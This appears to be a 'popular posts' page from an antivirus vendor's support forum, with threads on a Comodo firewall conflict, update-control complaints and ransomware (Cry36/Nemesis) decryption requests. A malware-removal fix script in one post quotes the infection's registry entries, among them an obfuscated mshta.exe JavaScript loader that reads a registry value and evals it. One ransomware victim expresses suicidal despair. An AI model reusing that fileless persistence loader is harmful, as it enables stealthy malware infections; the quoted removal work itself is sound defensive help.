Popular Content

Showing content with the highest reputation since 05/18/18 in all areas

  1. 2 points
    I could only confirm David's post - on both my computers with Comodo (Win 7 64 bit, SSD HDD - as this probably had some impact on that unpleasant EAM behaviour) I switched to stable version and all seems to work. So yes, the problem with Comodo on some comps is probably over. I want to add my two cents to the discussion above. I have worked with computers for more than 25 years. A lot of years ago I worked as a programmer. This is all over now (even as I sometimes write a few lines of code in php and MySQL). My main work is with graphics software, but for a few of my customers I do also some kind of computer service. Not that I'm any expert in LANs or such but I could help individual users with some computer problems. So my computer knowledge is a little bit above standard. Usually I could help myself with any and all hardware or software troubles, but this time it was very frustrating and it took me a lot of precious time (which I should have spent differently) to revert my work and home computers back to working state. And it was because of EAM "no user asking" PROGRAM update (unfortunately it even didn't create system restore point - why this isn't standard upon bigger program update is above my understanding). This is why I ask you for avoiding such program behaviour. I understand your points but you should hear our opinions also. Maybe it's not wise to let some users decide about something they don't understand but I don't ask you to do this. You can let default EAM settings on stable version update but I'd appreciate the possibility for some of us to switch off this behaviour. Why couldn't you add to setup/actualization menu two choices: 1) update program without asking user 2) update program only after user confirmation? First choice could be the default one - I don't care. This would be enough. And (not only) after this experience I'd immediately switch it to the "update program only after user confirmation".
    And a few words to Neneduty's post: no, I won't uninstall ANY of my programs only because ANY antivirus software couldn't work with it. All programs are in my computers for good reasons (this is true especially for Comodo firewall). This could end that Emsisoft (or any other antivirus producer for that reason) could ask me not to use my graphics programs, because they could be in conflict with EAM (btw. there was situation Adobe Acrobat didn't start because of conflict with EAM one time - I resolved it with Emsisoft help then - fortunately Emsisoft helpdesk didn't want me to uninstall it :-) ). Antivirus software is in any computer to help not to be infected by computer virus; it's not there to block users to work with their programs... Any other debate about this is ridiculous. Uffff. Enough from me.
  2. 1 point
    Fixed that for you. Are you messing with me here? Meant that what you said, being done intentionally, would signify malicious intent. Outcome can be malicious (or not) regardless of intent. EAM is not a complete security software by any stretch to be able to be used on its own, at least by those who know what they want from their computers. It's a piece of software with some specific purposes, which shouldn't get to make any requests about what else runs alongside. Plus, one of your selling points a few years ago was that you specifically advertised as being compatible with other security software, even in case of overlapping features, not to mention complementary ones. You may have moved away from that, as well as from most other good things you had going, but a part of your users, those who came and stayed in part for those features, aren't going to just drop their expectations and, more importantly, drastically change how they use their computers just because you say so. As far as I'm concerned, having security software including EAM on a computer would typically mean either EAM+CFW or EAM+ZA+Sandboxie. There would be a number of other options past that, of course, but at the very least those should be the basic test setup.
  3. 1 point
    That's malicious intent. Intent doesn't matter for a malicious outcome. And security software is far more likely to mess up systems than most programs. And in this case it was something you should have seen early in testing. Said that since you decided years ago to no longer provide a proper firewall (not to mention HIPS and sandboxing, don't know if you had that even then), you should thoroughly test your software paired with at least the leading alternatives that provide those missing features, making a full suite when put together. But, again, talking to walls. Or worse.
  4. 1 point
    Hi all. Just a note that your fix seems to have finally fixed the problem. I had a chance to try it a few days ago and so far I can't tell any obvious problems. I wanted to test it for a bit before replying. I put it in Beta mode, then when that worked put it in Stable. Those both survived reboots. I did update to the latest Comodo Firewall before that (I had been about an update behind). So thanks for eventually finding the fix. This most recent discussion here has motivated me to move back to Delayed, though. I think, generally speaking, experienced users have update fatigue. MS Windows and its attempt at controlling the update process is mostly the culprit here (the whole unpaid beta tester thing and how frequently they break things, after shamelessly tricking many people into Win10), but it isn't only them. Follow the https://www.askwoody.com/ site for a while and one sees the big picture. Despite this recent hiccup with Comodo and how much time it cost me (!) two months ago, I still love your software. I know you don't want what must feel like many different versions of your software. There have also been many reported software and hardware vulnerabilities this year. It must be a difficult time to be responsible for anti-malware software. It won't get any easier. You have to run this show at the level you are capable of. Still, giving the user more control and choice should be a priority. One only has to be burned by updates going wrong a couple of times and one gets update fatigue. Updates going wrong have cost me infinitely more time than malware!
  5. 1 point
    Hi, They may be offline. Depends on where they are located and their working hours. Please run FRST again. Next, select and copy the following text, including the words Start:: and End::. Switch back to the FRST program window, and click the Fix button. It should read the fix directly from the clipboard and run the fix. When it is finished, please attach the fixlog.txt file it created in the same folder the FRST program is in.

    Start::
    HKLM-x32\...\Run: [LManager] => [X]
    HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
    HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
    HKU\S-1-5-21-2105802288-3190227250-3155975196-1000\...\Run: [*fhfucdg<*>] => "C:\Windows\system32\mshta.exe" javascript:A7vTPl2Q="ImV6Kb";s8U=new%20ActiveXObject("WScript.Shell");GueHx9H="7";nV87Dw=s8U.RegRead("HKCU\\software\\ulrk\\udnbjg");PMswlUc26="C";eval(nV87Dw);wCLbpC50 (the data entry has 10 more characters). <==== ATTENTION (Value Name with invalid characters)
    HKU\S-1-5-21-2105802288-3190227250-3155975196-1000\...\Run: [*pkmf<*>] => "C:\Users\Miyako\AppData\Local\bfd48c\e827be.lnk" <==== ATTENTION (Value Name with invalid characters)
    HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
    Startup: C:\Users\Miyako\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b0c166.lnk [2016-08-10]
    Startup: C:\Users\Miyako\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bb68ed.lnk [2017-01-07]
    SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-2105802288-3190227250-3155975196-1000 -> DefaultScope {064BF86B-A0C8-47D8-BED5-98BED62949D2} URL =
    SearchScopes: HKU\S-1-5-21-2105802288-3190227250-3155975196-1000 -> {064BF86B-A0C8-47D8-BED5-98BED62949D2} URL =
    BHO: No Name -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> No File
    Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - No File
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    2018-06-05 14:08 - 2016-05-18 20:29 - 000000000 ____D C:\Users\Miyako\AppData\Local\bfd48c
    HKU\S-1-5-21-2105802288-3190227250-3155975196-1000\Software\Classes\f46b3f: "C:\Windows\system32\mshta.exe" "javascript:McISD83="KsHnjD8x";f75i=new ActiveXObject("WScript.Shell");NX2bYFH="VYUiITa";Zw40eU=f75i.RegRead("HKCU\\software\\ulrk\\udnbjg");ooksS3c="QFNgfL";eval(Zw40eU);V7oaNMtG8="LMKuwWtf";" <==== ATTENTION
    C:\Users\Miyako\AppData\Local\bfd48c\e827be.lnk
    Reg: reg delete "HKCU\software\ulrk\udnbjg" /f
    End::
  6. 1 point
    I would believe those TEMP files are created by BitDefender's scan engine when it is scanning inside archives (or when quarantined files are being rescanned). I don't think they give any specific way to whitelist the files so that they won't be detected, however I will ask our malware analysts for more info.
  7. 1 point
    The unauthorized access attempt to your GMail account may have been unrelated, however even if it was the criminal who made/distributed Cry36/CryptON then please keep in mind that these guys almost always use a VPN to hide their physical location. If they did not, then law enforcement would track them down by their IP address rather quickly, and they'd only have a few months before they were arrested while law enforcement gathered enough evidence to present at a trial.
  8. 1 point
    That is possible, however keep in mind that Cry36 has been around for some time without any real progress being made in decryption, so please note that it may take a little while for security researchers and/or law enforcement to finally get their hands on the private keys to decrypt your files.
  9. 1 point
    Good day, No, they are not. Our detections are actually better. Unfortunately, a chain of unfortunate circumstances led to another bug, which we had already fixed at the time of the test but had not yet been able to release. Unfortunately, the test fell exactly in the period when we were struggling with the issue with HP. Kind regards, Kathrin
  10. 1 point
    FYI: This does appear to be a new variant of the Nemesis ransomware, which Cry36 is a variant of as well. An affiliate/reseller for Dr.Web is claiming that Dr.Web is capable of decrypting the files (or at least figuring out the private key to use to decrypt them), and selling the service on BleepingComputer's forums. Note that Dr.Web will provide this service for free to anyone who has a license for their business Anti-Virus software. They have a form to request this service available at this link. Edit: Please see the note in the post at this link about Dr.Web not being able to decrypt this ransomware, and your current options for recovering files.
  11. 1 point
    I have the same ransomware by [email protected] Is there any chance to decrypt it in the near future? Is anyone working on a decryptor? I'll kill myself, those files were everything for me, I worked for years... Please give me some hope Emsisoft.. I am heartbroken and close to killing myself.
  12. 1 point
    If you want you can these samples here no problem
  13. 0 points
    Please follow the steps here and attach the requested logs so that one of our experts can help you. https://support.emsisoft.com/announcement/2-start-here-if-you-dont-we-are-just-going-to-send-you-back-to-this-thread/
  14. 0 points
    There is an unlock for this ransomware; the problem is you need to know the key. One has to do a brute-force attack for that: ... Emsisoft, you cannot build a brute force cracker having as core this unlock software I have just sent through sendspace?
  15. 0 points
    Hello, I'm infected with [email protected] and I don't have a backup. I just need to recover my important university documents, nothing else. Please, is there any way to recover them?
  16. 0 points
    This is true, however we have to consider what has value to our customers, and since the vast majority of our customers don't even know what a firewall is (let alone how to use it) we feel that such technology simply over complicates the product without adding any real value for them, even if it is just a set of controls for the built-in Windows Firewall.
  17. 0 points
    For those on Wilders who are wondering if the mysterious company that purchased Binisoft WFC happens to be Emsisoft, we already went down that road with Online Armor, and then after discontinuing it we developed and subsequently discontinued our own firewall technology. While it's impossible to predict the future, I expect that our interest in such technologies will remain minimal at least in the near future.
  18. -1 points
    This conversation is way off the original topic. The ongoing discussion is neither on topic nor constructive. Therefore this topic is now closed.